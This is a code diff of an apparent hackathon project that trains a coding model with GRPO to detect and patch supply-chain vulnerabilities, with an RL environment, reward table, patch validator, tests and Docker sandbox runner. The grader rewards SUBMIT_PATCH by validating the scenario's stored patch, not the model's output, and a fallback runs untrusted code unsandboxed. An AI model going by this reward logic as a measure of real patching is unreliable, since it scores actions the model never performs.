            # An explicitly supplied scenario always wins, even when the
            # scenario file could not be loaded.
            self.current_scenario = options["scenario"]
        elif self.scenarios:
            index = int(self.np_random.integers(len(self.scenarios)))
            self.current_scenario = self.scenarios[index]
        else:
            # Fallback if no scenarios to prevent crash
            self.current_scenario = {
                "id": "fallback", "type": "functional", "label": "benign",
                "code_snippet": "print('hello')", "patch": None
            }

        self.step_counter = 0
        self.last_action = None
        self.last_reward = 0

        return self._get_obs(), {}

    def step(self, action):
        """
        Apply ``action`` to the current scenario.

        Returns:
            ``(observation, reward, terminated, truncated, info)``.
            ``truncated`` is always ``False``; hitting ``max_steps`` is
            reported through ``terminated`` together with a 0.5 penalty.

        Raises:
            RuntimeError: if called before ``reset()``.
        """
        if self.current_scenario is None:
            raise RuntimeError("SentinelEnv.step() called before reset()")

        self.step_counter += 1

        reward = 0
        done = False
        info = {}

        self.last_action = action
        scenario = self.current_scenario

        if action == self.ACTION_ANALYZE:
            # Small exploration reward for analyzing
            reward = 0.05
            info = {"analysis": "Static analysis reveals potential injection points if untrusted input is passed."}

        elif action == self.ACTION_EXECUTE_SANDBOX:
            # Execute code snippet
            result = run_code(scenario["code_snippet"], timeout_sec=3, use_docker=self.use_docker)
            info = {"telemetry": result}
            # Shaped reward for gathering info
            reward = 0.1

        elif action == self.ACTION_BLOCK_PR:
            if scenario["label"] == "malicious":
                reward = 1.5  # Correctly blocked
            else:
                reward = -2.0  # False positive block
            done = True

        elif action == self.ACTION_SUBMIT_PATCH:
            scenario_patch = scenario.get("patch")
            if not scenario_patch:
                if scenario["label"] == "benign":
                    # Benign code doesn't need a patch, but submitting one is a mistake
                    reward = -1.0
                else:
                    # Should have a patch for malicious, but it's missing in scenario?
                    reward = -0.5
            else:
                success, msg, details = validate_patch(scenario, scenario_patch, use_docker=self.use_docker)
                info = {"validation_success": success, "msg": msg, "details": details}

                if success:
                    if scenario["label"] == "malicious":
                        reward = 4.0  # High reward for fixing vulnerability
                    else:
                        reward = -2.5  # High penalty for breaking benign code
                else:
                    reward = -1.5  # Patch failed validation
            done = True

        elif action == self.ACTION_REQUEST_REVIEW:
            if scenario["type"] == "false_positive":
                reward = 0.5  # Good choice for ambiguous cases
            else:
                reward = 0.0
            done = True
            info = {"review_requested": True}

        # Check max steps
        if self.step_counter >= self.max_steps and not done:
            reward -= 0.5  # Penalty for timeout
            done = True

        self.last_reward = reward
        return self._get_obs(), reward, done, False, info

    def render(self):
        """Print the step counter, last action and last reward."""
        print(f"Step: {self.step_counter} | Action: {self.last_action} | Reward: {self.last_reward}")
|
sentinel_synth/tests/__init__.py
ADDED
|
File without changes
|
sentinel_synth/tests/test_validator.py
ADDED
|
@@ -0,0 +1,57 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
import pytest
|
| 2 |
+
from sentinel_synth.validation.patch_validator import validate_patch
|
| 3 |
+
|
| 4 |
+
def test_syntax_error_detected():
    """A patch with an unterminated string literal is rejected at the syntax stage."""
    broken_patch = "print('hello"  # Missing closing quote
    scenario = dict(type="functional", code_snippet="print('hello')", unit_test_code=None)

    outcome = validate_patch(scenario, broken_patch, use_docker=False)
    ok, message, info = outcome

    assert ok is False
    assert message == "Syntax error"
    assert "error" in info
|
| 13 |
+
|
| 14 |
+
def test_unit_test_pass():
    """A functionally equivalent patch passes the scenario's unit test."""
    original_code = "def add(a, b): return a + b"
    unit_test = "import code\nassert code.add(1, 2) == 3\n"
    scenario = dict(type="functional", code_snippet=original_code, unit_test_code=unit_test)
    reformatted_patch = "def add(a, b):\n return a + b\n"

    ok, message, _info = validate_patch(scenario, reformatted_patch, use_docker=False)

    assert ok is True
    assert message == "Patch is valid"
|
| 26 |
+
|
| 27 |
+
def test_unit_test_fail():
    """A patch that changes the function's result is caught by the unit test."""
    original_code = "def add(a, b): return a + b"
    unit_test = "import code\nassert code.add(1, 2) == 3\n"
    scenario = dict(type="functional", code_snippet=original_code, unit_test_code=unit_test)
    # Breaking the functionality in the patch
    breaking_patch = "def add(a, b):\n return a - b\n"

    ok, message, info = validate_patch(scenario, breaking_patch, use_docker=False)

    assert ok is False
    assert message == "Unit test failed"
    assert "test_output" in info
|
| 41 |
+
|
| 42 |
+
def test_vulnerability_remains():
    """A patch that keeps the simulated backdoor output is reported as still vulnerable."""
    # Attack injects a hidden print which simulates a backdoor
    backdoor_line = "print('Hello from hidden exec!')\n"
    scenario = dict(
        type="true_positive",
        attack_type="obfuscated_exec",
        code_snippet=backdoor_line + "def add(a, b): return a + b",
        unit_test_code="import code\nassert code.add(1, 2) == 3\n",
    )
    # Patch fails to remove the backdoor, only formats the code
    cosmetic_patch = backdoor_line + "def add(a, b):\n return a + b\n"

    ok, message, info = validate_patch(scenario, cosmetic_patch, use_docker=False)

    assert ok is False
    assert message == "Vulnerability remains"
    assert "evidence" in info
|
sentinel_synth/training/__init__.py
ADDED
|
File without changes
|
sentinel_synth/training/train_grpo.py
ADDED
|
@@ -0,0 +1,187 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
import os
|
| 2 |
+
import argparse
|
| 3 |
+
import numpy as np
|
| 4 |
+
|
| 5 |
+
try:
|
| 6 |
+
import wandb
|
| 7 |
+
except ImportError:
|
| 8 |
+
wandb = None
|
| 9 |
+
|
| 10 |
+
# In a real environment, we would also import:
|
| 11 |
+
# from unsloth import FastLanguageModel
|
| 12 |
+
# from trl import GRPOTrainer, GRPOConfig
|
| 13 |
+
# But for the hackathon prototype and safe execution without massive deps,
|
| 14 |
+
# we use mock classes in dry-run mode if the real ones aren't available.
|
| 15 |
+
|
| 16 |
+
from ..envs.sentinel_env import SentinelEnv
|
| 17 |
+
|
| 18 |
+
def _completion_text(completion):
    """Return the generated text of one completion.

    Accepts a plain string as well as a conversational completion, i.e. a list
    of message dicts whose first entry carries the text under ``"content"``.
    """
    if isinstance(completion, str):
        return completion
    return completion[0]["content"]


def _parse_action(text, default):
    """Return the integer inside ``<action>...</action>``, or ``default`` if absent."""
    import re  # local import: the module's top-level imports do not include re

    match = re.search(r"<action>(\d+)</action>", text)
    return int(match.group(1)) if match else default


def _run_dry_run(env, args):
    """Roll out a fixed rule-based policy and print mock GRPO statistics."""
    print("[DRY RUN] Loading dummy model instead of Qwen2.5-Coder-7B in 4-bit...")

    def dummy_policy(obs):
        # Deterministic dummy policy for dry runs
        if obs["risk_score"][0] > 0.5:
            return SentinelEnv.ACTION_SUBMIT_PATCH
        return SentinelEnv.ACTION_ANALYZE

    # 4. Dummy Training Loop
    epochs = 3
    batch_size = 4
    # Always run at least one batch so the epoch mean is never taken over an
    # empty list (the env supplies a fallback scenario when none are loaded).
    num_batches = max(1, len(env.scenarios) // batch_size)

    for epoch in range(epochs):
        print(f"--- Epoch {epoch+1}/{epochs} ---")
        total_rewards = []

        for batch_idx in range(num_batches):
            trajectories = []
            for _ in range(args.group_size):
                obs, _ = env.reset()
                done = False
                trajectory_reward = 0
                steps = 0

                while not done and steps < env.max_steps:
                    action = dummy_policy(obs)
                    obs, reward, done, _, _ = env.step(action)
                    trajectory_reward += reward
                    steps += 1

                trajectories.append(trajectory_reward)

            # Mock GRPO Advantage calculation
            mean_reward = np.mean(trajectories)
            std_reward = np.std(trajectories) + 1e-8  # epsilon avoids division by zero
            advantages = [(r - mean_reward) / std_reward for r in trajectories]

            total_rewards.append(mean_reward)
            print(f"Batch {batch_idx}: Mean Reward: {mean_reward:.2f}, Advantages: {[f'{a:.2f}' for a in advantages]}")

        print(f"Epoch {epoch+1} Mean Reward: {np.mean(total_rewards):.2f}")

    print("[DRY RUN] Training complete. Saved dummy adapter to ./grpo_lora/")


def _run_grpo(env, args, use_wandb):
    """Fine-tune with trl's GRPOTrainer, using the environment as reward function."""
    print("Initializing true GRPO training with trl and unsloth...")
    # Only the imports are guarded: an ImportError raised later, during
    # training itself, must not be reported as a missing dependency.
    try:
        from unsloth import FastLanguageModel
        from trl import GRPOTrainer, GRPOConfig
        from datasets import Dataset
    except ImportError as e:
        print(f"Skipping standard training fallback. Missing required dependency: {e}")
        return

    max_seq_length = args.max_seq_len
    model, tokenizer = FastLanguageModel.from_pretrained(
        model_name="unsloth/Qwen2.5-Coder-7B-Instruct",
        max_seq_length=max_seq_length,
        load_in_4bit=True,
    )

    model = FastLanguageModel.get_peft_model(
        model,
        r=16,
        target_modules=["q_proj", "k_proj", "v_proj", "o_proj",
                        "gate_proj", "up_proj", "down_proj"],
        lora_alpha=16,
        lora_dropout=0,
        bias="none",
        use_gradient_checkpointing="unsloth",
        random_state=3407,
    )

    # We need a proper dataset of prompts
    def build_prompt(s):
        return f"Analyze this Python code for supply-chain vulnerabilities.\n<code_snippet>\n{s['code_snippet']}\n</code_snippet>\nYour response MUST include a thought process in <thought> tags and a final action (0-4) in <action> tags.\n0: ANALYZE, 1: EXECUTE_SANDBOX, 2: BLOCK_PR, 3: SUBMIT_PATCH, 4: REQUEST_REVIEW."

    prompt_data = [{"prompt": build_prompt(s)} for s in env.scenarios]
    # Exact prompt -> scenario lookup; unambiguous even when two scenarios
    # share their first 100 characters.
    scenario_by_prompt = {
        row["prompt"]: s for row, s in zip(prompt_data, env.scenarios)
    }
    dataset = Dataset.from_list(prompt_data)

    def env_reward_function(completions, prompts, **kwargs):
        """
        Extracts chosen action, runs env, returns reward array.
        Matches completions to their corresponding scenario from prompts.
        """
        rewards = []
        for prompt, completion in zip(prompts, completions):
            # A completion without a parsable action counts as ANALYZE.
            action = _parse_action(
                _completion_text(completion), SentinelEnv.ACTION_ANALYZE
            )

            target_scenario = (
                scenario_by_prompt.get(prompt) if isinstance(prompt, str) else None
            )
            if target_scenario is None:
                # Fallback for prompts that were altered before reaching us:
                # search by code-snippet prefix.
                target_scenario = next(
                    (s for s in env.scenarios if s["code_snippet"][:100] in prompt),
                    None,
                )

            if target_scenario is None:
                rewards.append(0.0)
                continue

            # Reset env with this specific scenario
            env.reset(options={"scenario": target_scenario})
            _, reward, _, _, _ = env.step(action)
            rewards.append(float(reward))
        return rewards

    training_args = GRPOConfig(
        output_dir="grpo_lora",
        learning_rate=args.learning_rate,
        per_device_train_batch_size=1,
        # NOTE(review): these two options may be absent from older argument
        # namespaces, hence the getattr defaults. TRL constrains the batch
        # size relative to num_generations - confirm the fallback against the
        # installed TRL version.
        gradient_accumulation_steps=getattr(
            args, "gradient_accumulation_steps", args.group_size
        ),
        max_prompt_length=args.max_seq_len // 2,
        max_completion_length=args.max_seq_len // 2,
        num_generations=args.group_size,
        max_steps=getattr(args, "max_steps", -1),
        save_steps=50,
        logging_steps=10,
        report_to="wandb" if use_wandb else "none",
    )

    trainer = GRPOTrainer(
        model=model,
        reward_funcs=[env_reward_function],
        args=training_args,
        train_dataset=dataset,
    )

    trainer.train()
    model.save_pretrained_merged("grpo_lora", tokenizer, save_method="lora")
    print("Training complete and adapter saved.")


def train_agent(args):
    """
    Main training loop for Sentinel-Synth GRPO.

    Args:
        args: Namespace with ``dry_run``, ``use_docker``, ``learning_rate``,
            ``group_size`` and ``max_seq_len``; ``gradient_accumulation_steps``
            and ``max_steps`` are optional.

    With ``args.dry_run`` a rule-based policy is rolled out and mock GRPO
    statistics are printed; otherwise real GRPO training is attempted and
    skipped with a message if unsloth/trl/datasets cannot be imported.
    """
    # 1. Setup WandB
    use_wandb = False
    if args.dry_run:
        print("[DRY RUN] WandB initialization skipped.")
    elif wandb is None:
        # wandb is an optional import; train without experiment tracking
        # instead of failing on `None.init`.
        print("Warning: wandb is not installed; continuing without experiment tracking.")
    else:
        wandb.init(project="sentinel-synth", name="grpo-qwen2.5-coder-7b", config=vars(args))
        use_wandb = True

    # 2. Load Environment
    env = SentinelEnv(use_docker=args.use_docker)
    print(f"Loaded environment with {len(env.scenarios)} scenarios.")

    # 3. Load Model (Mock or unsloth)
    if args.dry_run:
        _run_dry_run(env, args)
    else:
        _run_grpo(env, args, use_wandb)
|
| 177 |
+
|
| 178 |
+
if __name__ == "__main__":
    # Command-line entry point: parse options and hand them to train_agent.
    parser = argparse.ArgumentParser()
    parser.add_argument("--dry-run", action="store_true", help="Run with mock components without GPU.")
    parser.add_argument("--use-docker", action="store_true", help="Use Docker for execution fallback in env.")
    parser.add_argument("--learning-rate", type=float, default=1e-6)
    parser.add_argument("--group-size", type=int, default=4)
    parser.add_argument("--max-seq-len", type=int, default=1024)
    # train_agent reads args.gradient_accumulation_steps and args.max_steps in
    # the non-dry-run path; without these options that path fails with
    # AttributeError.
    parser.add_argument("--gradient-accumulation-steps", type=int, default=4,
                        help="Gradient accumulation steps passed to GRPOConfig.")
    parser.add_argument("--max-steps", type=int, default=-1,
                        help="Total training steps passed to GRPOConfig (-1 leaves the limit to the trainer).")

    args = parser.parse_args()
    train_agent(args)
|
sentinel_synth/validation/__init__.py
ADDED
|
File without changes
|
sentinel_synth/validation/docker_runner.py
ADDED
|
@@ -0,0 +1,107 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
import os
|
| 2 |
+
import tempfile
|
| 3 |
+
import subprocess
|
| 4 |
+
import shutil
|
| 5 |
+
|
| 6 |
+
# To support --no-docker or environments where docker isn't running yet.
|
| 7 |
+
def run_code(code: str, timeout_sec: int = 5, use_docker: bool = True) -> dict:
    """
    Executes Python code in an isolated environment.
    If use_docker is True, runs in `sentinel-sandbox:latest`.
    If False, runs locally using subprocess (UNSAFE for real workloads, but fine for demo/dev).

    The script is written to a fresh temporary directory which is also used as
    its working directory, so files it creates via relative paths are reported
    in ``file_writes`` and removed afterwards.

    Args:
        code: Python source to execute.
        timeout_sec: Seconds to wait before the run is abandoned.
        use_docker: Run inside the Docker sandbox instead of locally.

    Returns:
        Dict with ``stdout``, ``stderr``, ``exit_code`` (-1 if the process did
        not finish), ``network_blocked`` (equal to ``use_docker``) and
        ``file_writes`` (sorted names of new entries in the working directory).
    """
    import sys  # local import: only needed to locate the running interpreter

    temp_dir = tempfile.mkdtemp(prefix="sentinel_sandbox_")
    script_path = os.path.join(temp_dir, "script.py")

    result = {
        "stdout": "",
        "stderr": "",
        "exit_code": -1,
        "network_blocked": use_docker,
        "file_writes": []
    }

    try:
        # Written inside the try so the temp dir is cleaned up even if this fails.
        with open(script_path, "w", encoding="utf-8") as f:
            f.write(code)

        if use_docker:
            # We assume docker CLI is available.
            # NOTE(review): on timeout only the docker client process is
            # stopped by subprocess; confirm the container itself is reaped.
            cmd = [
                "docker", "run", "--rm",
                "--network", "none",
                "--memory", "256m",
                "--cpus", "0.5",
                "-v", f"{temp_dir}:/app",
                "-w", "/app",
                "sentinel-sandbox:latest",
                "python", "/app/script.py"
            ]
            working_dir = None
        else:
            # Local fallback (UNSAFE but necessary if Docker is unavailable).
            # Use the interpreter running this process rather than whatever
            # "python3" resolves to on PATH.
            cmd = [sys.executable or "python3", script_path]
            working_dir = temp_dir

        process = subprocess.run(
            cmd,
            capture_output=True,
            text=True,
            timeout=timeout_sec,
            cwd=working_dir,
        )

        result["stdout"] = process.stdout
        result["stderr"] = process.stderr
        result["exit_code"] = process.returncode

    except subprocess.TimeoutExpired as e:
        result["stderr"] = "Execution timed out."
        if e.stdout:
            # Partial output may be delivered as bytes even though text=True.
            result["stdout"] = e.stdout.decode('utf-8', errors='ignore') if isinstance(e.stdout, bytes) else e.stdout

    except Exception as e:
        result["stderr"] = f"Execution error: {str(e)}"

    finally:
        # Check if the code wrote any *new* files to the temp dir; done here so
        # writes made before a timeout are reported as well.
        try:
            result["file_writes"] = sorted(
                name for name in os.listdir(temp_dir) if name != "script.py"
            )
        except OSError:
            pass
        shutil.rmtree(temp_dir, ignore_errors=True)

    return result
|
| 72 |
+
|
| 73 |
+
def check_syntax(code: str, use_docker: bool = True) -> tuple[bool, str]:
    """Check python syntax of the code without fully executing it.

    The code is written to a temporary file and compiled with
    ``python -m py_compile``, either inside the Docker sandbox or with the
    interpreter running this process.

    Args:
        code: Python source to check.
        use_docker: Compile inside `sentinel-sandbox:latest` instead of locally.

    Returns:
        ``(True, "")`` when compilation succeeds, otherwise ``(False, message)``
        where ``message`` is the compiler's stderr or a description of why the
        check could not be completed.
    """
    import sys  # local import: only needed to locate the running interpreter

    temp_dir = tempfile.mkdtemp(prefix="sentinel_syntax_")
    script_path = os.path.join(temp_dir, "script.py")

    try:
        # Written inside the try so the temp dir is cleaned up even if this fails.
        with open(script_path, "w", encoding="utf-8") as f:
            f.write(code)

        if use_docker:
            cmd = [
                "docker", "run", "--rm",
                # Same isolation limits as run_code uses for execution.
                "--network", "none",
                "--memory", "256m",
                "--cpus", "0.5",
                "-v", f"{temp_dir}:/app",
                "sentinel-sandbox:latest",
                "python", "-m", "py_compile", "/app/script.py"
            ]
        else:
            cmd = [sys.executable or "python3", "-m", "py_compile", script_path]

        process = subprocess.run(
            cmd,
            capture_output=True,
            text=True,
            timeout=5
        )
        if process.returncode == 0:
            return True, ""
        return False, process.stderr
    except subprocess.TimeoutExpired:
        return False, "Syntax check timed out"
    except Exception as e:
        return False, f"Syntax check failed: {e}"
    finally:
        shutil.rmtree(temp_dir, ignore_errors=True)
|
sentinel_synth/validation/patch_validator.py
ADDED
|
@@ -0,0 +1,87 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
import os
|
| 2 |
+
import tempfile
|
| 3 |
+
import textwrap
|
| 4 |
+
from .docker_runner import run_code, check_syntax
|
| 5 |
+
|
| 6 |
+
def validate_patch(scenario: dict, patch_code: str, use_docker: bool = True) -> tuple[bool, str, dict]:
    """
    Validates a patch using a 3-step pipeline:
    1. Syntax Check
    2. Unit Test Execution
    3. Re-attack (Vulnerability Verification)

    Args:
        scenario: Scenario dict. Read keys: ``unit_test_code`` (optional),
            ``type``, ``attack_type`` (optional) and ``code_snippet``.
        patch_code: Full source of the patched module.
        use_docker: Forwarded to ``check_syntax`` and ``run_code``.

    Returns: (success, message, details_dict)
        ``message`` is one of "Syntax error", "Unit test failed",
        "Vulnerability remains" or "Patch is valid".
    """
    details = {}

    # 1. Syntax Check
    is_valid, err_msg = check_syntax(patch_code, use_docker=use_docker)
    if not is_valid:
        details["error"] = err_msg
        return False, "Syntax error", details

    # 2. Unit Test Execution
    unit_test_code = scenario.get("unit_test_code")
    if unit_test_code:
        # The unit test does something like "import code; assert code.func() == expected".
        # run_code executes a single script, so the patched source is loaded
        # into an in-memory module registered as 'code' before the test runs.
        # The patch is embedded via repr() so that quotes and backslashes in
        # it survive unchanged.
        combined_script = "\n".join([
            "import sys",
            "import types",
            "",
            "# Create a mock 'code' module",
            "module = types.ModuleType('code')",
            f"exec({patch_code!r}, module.__dict__)",
            "sys.modules['code'] = module",
            "",
            "# Run the unit test",
            unit_test_code,
            'print("TEST_SUCCESS")',
            "",
        ])

        result = run_code(combined_script, timeout_sec=5, use_docker=use_docker)
        if result["exit_code"] != 0 or "TEST_SUCCESS" not in result["stdout"]:
            details["test_output"] = result["stderr"] if result["stderr"] else result["stdout"]
            return False, "Unit test failed", details

    # 3. Re-attack (Vulnerability Verification)
    if scenario.get("type") == "true_positive" and scenario.get("attack_type"):
        # Run original code snippet to get baseline malicious behavior
        attack_result = run_code(scenario["code_snippet"], timeout_sec=5, use_docker=use_docker)

        # Run patched code
        patch_result = run_code(patch_code, timeout_sec=5, use_docker=use_docker)

        vulnerability_remains = False

        # Generic heuristic: Did the patch reduce suspicious side-effects?
        # 1. Compare file writes (malicious often creates/modifies files):
        #    the attack wrote files and the patch writes at least as many.
        attack_writes = attack_result.get("file_writes", [])
        patch_writes = patch_result.get("file_writes", [])
        if attack_writes and len(patch_writes) >= len(attack_writes):
            vulnerability_remains = True

        # NOTE: "network_blocked" in the telemetry only mirrors use_docker; it
        # is not evidence of a network attempt, so it is deliberately not
        # compared here (doing so rejected every patch when Docker was on).

        # 2. Specific attack type checks (refined)
        attack_type = scenario["attack_type"]
        if attack_type == "typosquatting":
            if "ImportError" in patch_result["stderr"] and "pythonn" in patch_result["stderr"]:
                vulnerability_remains = True
        elif attack_type == "obfuscated_exec":
            # If the patch still produces the same specific output as the obfuscated one
            if attack_result["stdout"].strip() != "" and patch_result["stdout"] == attack_result["stdout"]:
                vulnerability_remains = True

        if vulnerability_remains:
            details["evidence"] = {
                "attack_telemetry": attack_result,
                "patch_telemetry": patch_result
            }
            # Message text matches what the test suite asserts.
            return False, "Vulnerability remains", details

    details["validation_log"] = "All checks passed successfully."
    return True, "Patch is valid", details
|
setup.py
ADDED
|
@@ -0,0 +1,15 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
from setuptools import setup, find_packages
|
| 2 |
+
|
| 3 |
+
# Package metadata for Sentinel-Synth.
setup(
    name="sentinel_synth",
    version="0.1.0",
    packages=find_packages(),
    # The validation modules use built-in generic annotations such as
    # tuple[bool, str] in function signatures, which need Python 3.9+.
    python_requires=">=3.9",
    install_requires=[
        "gymnasium>=0.29.0",
        # Imported directly by the environment and the training script.
        "numpy",
        "docker>=7.0.0",
        "streamlit>=1.30.0",
        "wandb>=0.16.0",
        "pytest>=8.0.0",
        "synthetic-data-kit>=0.1.0",
    ],
)
|